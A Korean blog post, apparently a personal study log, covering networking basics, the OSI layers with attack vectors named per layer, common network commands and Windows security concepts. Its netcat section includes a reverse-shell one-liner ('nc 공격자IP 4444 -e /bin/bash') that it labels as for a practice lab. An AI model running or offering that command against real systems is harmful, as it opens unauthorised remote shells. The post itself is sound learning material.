보안을 전공했지만, 정작 보안을 가장 멀리했던 사람이 나였다.
첫 직장은 데이터 분석 회사였다.
그곳에서 데이터 분석에 흥미를 느꼈고, 더 나아가 AI에 관심이 생겼다. 전공이 보안이었지만 데이터 분석과 AI 분야의 공부를 더 많이 했었다. 그게 지금까지 이어져 현업에서 AI 엔지니어링과 데이터 엔지니어링을 하고 있다.
그러면서 느낀 것이 있다.
AI 시대에서 모델보다 데이터가 먼저다.
아무리 좋은 모델도 데이터가 오염되거나 탈취되면 의미가 없다. 실무에서, 그리고 사회 곳곳에서 터지는 크고 작은 보안 이슈들을 보면서 데이터를 지키지 못하면 그 피해는 고스란히 회사의 손해, 개인의 손해까지도 갈 수 있다는 것을 느꼈다.
보안은 이제 선택이 아닌 필수다.
전공으로 시작했지만 한동안 멀어졌던 그 길로, 다시 여정을 시작하려 한다.
2026.02.23 학습 내용 정리 — 네트워크 기본 개념부터 관련 명령어 및 OSI 7 Layer
목차
1. 네트워크 기본 용어
네트워크 (Network)
여러 컴퓨터 및 기타 디지털 장치들이 연결되어 정보를 공유할 수 있는 구조이다.
크게 LAN(Local Area Network), WAN(Wide Area Network)으로 나뉜다.
IP 주소 (IP Address)
인터넷 프로토콜(IP)에서 각 호스트가 네트워크 상에서 식별되기 위해 할당된 고유 주소이다.
| 구분 | 설명 | 예시 |
|---|---|---|
| IPv4 | 32bit, 4옥텟 구조 | 192.168.0.1 |
| IPv6 | 128bit, 주소 고갈 문제 해결 | 2001:db8::1 |
IP 주소 클래스 (IPv4 기준)
| 클래스 | 범위 | 용도 |
|---|---|---|
| A | 1.0.0.0 ~ 126.255.255.255 | 대규모 네트워크 |
| B | 128.0.0.0 ~ 191.255.255.255 | 중규모 네트워크 |
| C | 192.0.0.0 ~ 223.255.255.255 | 소규모 네트워크 |
사설(Private) IP 대역
| 대역 | 범위 |
|---|---|
| Class A | 10.0.0.0 ~ 10.255.255.255 |
| Class B | 172.16.0.0 ~ 172.31.255.255 |
| Class C | 192.168.0.0 ~ 192.168.255.255 |
사설 IP는 외부 인터넷과 직접 통신 불가 → NAT(Network Address Translation)를 통해 공인 IP로 변환 후 통신
서브넷 / 서브넷 마스크 (Subnet / Subnet Mask)
네트워크를 더 작은 단위로 분할한 네트워크 영역이다.
서브넷 마스크는 IP 주소에서 네트워크 부분과 호스트 부분을 구분하는 역할을 한다.
IP 주소: 192.168.1.10
서브넷 마스크: 255.255.255.0 (/24)
네트워크: 192.168.1.0
호스트 범위: 192.168.1.1 ~ 192.168.1.254
브로드캐스트: 192.168.1.255CIDR 표기법:
/24= 앞에서 24비트가 네트워크 주소를 의미
게이트웨이 (Gateway)
서로 다른 네트워크/서브넷 사이의 통신을 가능하게 하는 장치 또는 소프트웨어이다.
- 같은 서브넷 내 → 게이트웨이 없이 직접 통신 가능
- 다른 서브넷 간 → 반드시 게이트웨이(주로 라우터)를 거쳐야 통신 가능
[192.168.1.10] ──────→ [Gateway: 192.168.1.1] ──────→ [8.8.8.8 (Google DNS)]
내부 PC 공유기/라우터 외부 인터넷포트 (Port)
운영체제 상의 프로세스를 네트워크로 접근하기 위해 매핑되는 번호 (0 ~ 65535).
| 범위 | 구분 | 설명 |
|---|---|---|
| 0 ~ 1023 | Well-known Port | 시스템/표준 서비스 전용 |
| 1024 ~ 49151 | Registered Port | 특정 애플리케이션 등록 |
| 49152 ~ 65535 | Dynamic/Private Port | 임시 포트 (클라이언트 측) |
주요 포트 번호
| 포트 | 프로토콜 | 서비스 |
|---|---|---|
| 21 | FTP | 파일 전송 |
| 22 | SSH | 보안 원격 접속 |
| 23 | Telnet | 원격 접속 (비암호화) |
| 25 | SMTP | 이메일 전송 |
| 53 | DNS | 도메인 이름 해석 |
| 80 | HTTP | 웹 서비스 |
| 443 | HTTPS | 보안 웹 서비스 |
| 3389 | RDP | 윈도우 원격 데스크탑 |
로컬호스트 (Localhost)
자신의 컴퓨터를 나타내는 호스트 이름. IP 주소로는 127.0.0.1 (IPv4) 또는 ::1 (IPv6).
루프백(Loopback) 주소라고도 하며, 네트워크를 거치지 않고 자기 자신에게 패킷을 전송한다.
# 로컬 웹 서버 접속 예시
http://localhost:8080
http://127.0.0.1:8080DNS (Domain Name System)
도메인 이름 ↔ IP 주소 변환을 담당하는 프로토콜이자 네트워크 서비스.
사용자: www.google.com 입력
↓
DNS 서버에 질의 → 142.250.196.68 반환
↓
해당 IP로 접속2. 네트워크 명령어
ping
ICMP Echo Request/Reply를 이용해 대상 호스트의 생존 여부 및 응답 시간을 확인하는 명령어.
# 기본 사용
ping 8.8.8.8
ping google.com
# 횟수 지정
ping -c 4 8.8.8.8 # Linux
ping -n 4 8.8.8.8 # Windows
# 출력 예시
PING 8.8.8.8: 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=118 time=12.3 ms| 항목 | 설명 |
|---|---|
| ttl | Time To Live, 패킷의 수명(라우터를 거칠 때마다 1씩 감소) |
| time | 왕복 시간 (RTT, Round Trip Time) |
netstat
네트워크 연결 상태, 포트 사용 현황, 라우팅 테이블을 확인하는 명령어.
netstat -an # 모든 연결 및 포트 표시
netstat -tulpn # TCP/UDP 리스닝 포트 + 프로세스 (Linux)
netstat -ano # Windows: PID 포함 전체 출력
netstat -r # 라우팅 테이블 확인상태(State) 주요 값
| 상태 | 의미 |
|---|---|
| LISTEN | 연결 대기 중 |
| ESTABLISHED | 연결 수립됨 |
| TIME_WAIT | 연결 종료 후 대기 |
| CLOSE_WAIT | 원격 측에서 종료 신호 받음 |
nc (netcat)
TCP/UDP 연결을 통해 데이터를 읽고 쓰는 네트워크 도구. "스위스 군용 칼"이라 불린다.
# 서버 모드 (특정 포트 리스닝)
nc -lvnp 4444
# 클라이언트 모드 (서버에 연결)
nc 192.168.1.100 4444
# 배너 그래빙
echo "" | nc -w 1 192.168.1.1 80
# 파일 전송 (수신측)
nc -lvnp 9999 > received_file.txt
# 파일 전송 (송신측)
nc 192.168.1.100 9999 < file_to_send.txt
# 리버스 쉘 (공격 실습 환경)
# 수신 측: nc -lvnp 4444
# 송신 측: nc 공격자IP 4444 -e /bin/bash| 옵션 | 설명 |
|---|---|
-l | 리스닝 모드 |
-v | 상세 출력 |
-n | DNS 조회 없이 IP만 사용 |
-p | 포트 지정 |
-e | 연결 후 실행할 프로그램 지정 |
기타 유용한 네트워크 명령어
# 도메인 → IP 조회
nslookup google.com
dig google.com
# 라우팅 경로 추적
traceroute 8.8.8.8 # Linux
tracert 8.8.8.8 # Windows
# 네트워크 인터페이스 정보
ifconfig # Linux (구버전)
ip addr # Linux (최신)
ipconfig # Windows
# ARP 테이블 확인
arp -a3. OSI 7 Layer
OSI(Open Systems Interconnection) 모델은 네트워크 통신을 7개의 계층으로 추상화한 표준 모델이다.
┌─────────────────────────────────────────┐
│ 7. Application (응용 계층) │ ← 사용자와 직접 상호작용
├─────────────────────────────────────────┤
│ 6. Presentation (표현 계층) │ ← 데이터 인코딩/암호화
├─────────────────────────────────────────┤
│ 5. Session (세션 계층) │ ← 연결 세션 관리
├─────────────────────────────────────────┤
│ 4. Transport (전송 계층) │ ← 포트, 신뢰성 있는 전송
├─────────────────────────────────────────┤
│ 3. Network (네트워크 계층) │ ← IP 주소, 라우팅
├─────────────────────────────────────────┤
│ 2. Data Link (데이터 링크 계층) │ ← MAC 주소, 프레임
├─────────────────────────────────────────┤
│ 1. Physical (물리 계층) │ ← 비트, 전기 신호
└─────────────────────────────────────────┘PDU (Protocol Data Unit) - 계층별 데이터 단위
| 계층 | PDU 명칭 |
|---|---|
| 7-5 | Message (메시지) |
| 4 | Segment (세그먼트) |
| 3 | Packet (패킷) |
| 2 | Frame (프레임) |
| 1 | Bit (비트) |
4. OSI 7 Layer 별 프로토콜 및 공격 벡터
Layer 7 — 응용 계층 (Application)
| 프로토콜 | 용도 |
|---|---|
| HTTP/HTTPS | 웹 통신 |
| FTP/SFTP | 파일 전송 |
| SMTP/POP3/IMAP | 이메일 |
| DNS | 도메인 이름 해석 |
| SSH | 보안 원격 접속 |
| Telnet | 원격 접속 |
주요 공격 벡터
- SQL Injection, XSS, CSRF
- HTTP Flood (DoS)
- DNS 스푸핑 / DNS 증폭 공격
- 피싱 (Phishing)
Layer 6 — 표현 계층 (Presentation)
| 프로토콜/기술 | 용도 |
|---|---|
| SSL/TLS | 암호화 |
| JPEG, PNG | 이미지 포맷 |
| ASCII, UTF-8 | 문자 인코딩 |
주요 공격 벡터
- SSL Stripping (HTTPS → HTTP 다운그레이드)
- 인코딩 우회를 통한 필터 회피
Layer 5 — 세션 계층 (Session)
| 프로토콜 | 용도 |
|---|---|
| NetBIOS | 윈도우 네트워크 서비스 |
| RPC | 원격 프로시저 호출 |
| PPTP | VPN 터널링 |
주요 공격 벡터
- 세션 하이재킹 (Session Hijacking)
- 세션 고정 공격 (Session Fixation)
Layer 4 — 전송 계층 (Transport)
| 프로토콜 | 특징 |
|---|---|
| TCP | 연결 지향, 신뢰성 보장, 3-way handshake |
| UDP | 비연결, 빠름, 신뢰성 낮음 |
TCP 3-Way Handshake
클라이언트 ──SYN──────────────→ 서버
클라이언트 ←──SYN+ACK───────── 서버
클라이언트 ──ACK──────────────→ 서버
[연결 수립]주요 공격 벡터
- SYN Flood: SYN 패킷만 대량 전송하여 서버 자원 고갈
- UDP Flood: UDP 패킷 대량 전송
- 포트 스캐닝
Layer 3 — 네트워크 계층 (Network)
| 프로토콜 | 용도 |
|---|---|
| IP (IPv4/IPv6) | 주소 지정, 패킷 라우팅 |
| ICMP | 오류 보고, ping |
| ARP | IP → MAC 주소 변환 |
| OSPF, BGP | 라우팅 프로토콜 |
주요 공격 벡터
- IP 스푸핑
- ICMP Flood (Ping of Death, Smurf Attack)
- 라우팅 테이블 조작
Layer 2 — 데이터 링크 계층 (Data Link)
| 프로토콜 | 용도 |
|---|---|
| Ethernet | 유선 LAN 표준 |
| Wi-Fi (802.11) | 무선 LAN |
| ARP | IP ↔ MAC 매핑 |
주요 공격 벡터
- ARP 스푸핑: ARP 테이블 오염으로 MAC 주소 위조 → MITM 공격 가능
- MAC Flooding: 스위치의 MAC 주소 테이블 포화
- VLAN 호핑
Layer 1 — 물리 계층 (Physical)
| 구성 요소 | 예시 |
|---|---|
| 전송 매체 | 케이블, 광섬유, 무선 |
| 장비 | 허브, 리피터, NIC |
주요 공격 벡터
- 도청(탭핑): 물리적으로 케이블에 접근하여 신호 도청
- 신호 방해(재밍): 무선 주파수 방해
5. Windows 관련 개념
윈도우 네트워크 명령어
# 네트워크 설정 확인
ipconfig
ipconfig /all # 상세 정보
# DNS 캐시 초기화
ipconfig /flushdns
# 포트 및 연결 확인
netstat -ano
netstat -ano | findstr :80 # 80 포트만 필터
# 라우팅 경로 추적
tracert 8.8.8.8
# ARP 테이블 확인
arp -a주요 윈도우 보안 개념
| 개념 | 설명 |
|---|---|
| RDP (3389) | 원격 데스크탑 프로토콜, 주요 공격 대상 포트 |
| SMB (445) | 파일 공유 프로토콜, WannaCry 랜섬웨어 악용 |
| WinRM (5985) | 원격 관리 프로토콜 |
| Windows Defender | 윈도우 내장 보안 솔루션 |
| UAC | 사용자 계정 컨트롤, 권한 상승 방지 |
정리 요약
| 계층 | 이름 | 프로토콜 | 주요 공격 |
|---|---|---|---|
| 7 | Application | HTTP, DNS, FTP, SSH | XSS, SQL Injection, HTTP Flood |
| 6 | Presentation | SSL/TLS | SSL Stripping |
| 5 | Session | NetBIOS, RPC | Session Hijacking |
| 4 | Transport | TCP, UDP | SYN Flood, Port Scan |
| 3 | Network | IP, ICMP, ARP | IP Spoofing, Ping Flood |
| 2 | Data Link | Ethernet, Wi-Fi | ARP Spoofing, MAC Flooding |
| 1 | Physical | - | 도청, 재밍 |
끝으로, 오랜만에 보안 공부를 해보니 이전에 학부에서 공부했던게 새록새록 떠올라 신기했다.
새로 배운 것들도 있지만, 무언가 흩어져있던 지식의 점들이 하나의 선으로 이어지는 느낌이 들었다. 앞으로 더 많은 지식의 점들을 이어나가며, 목표하는 보안 커리어를 차근차근 쌓아 가고싶다.
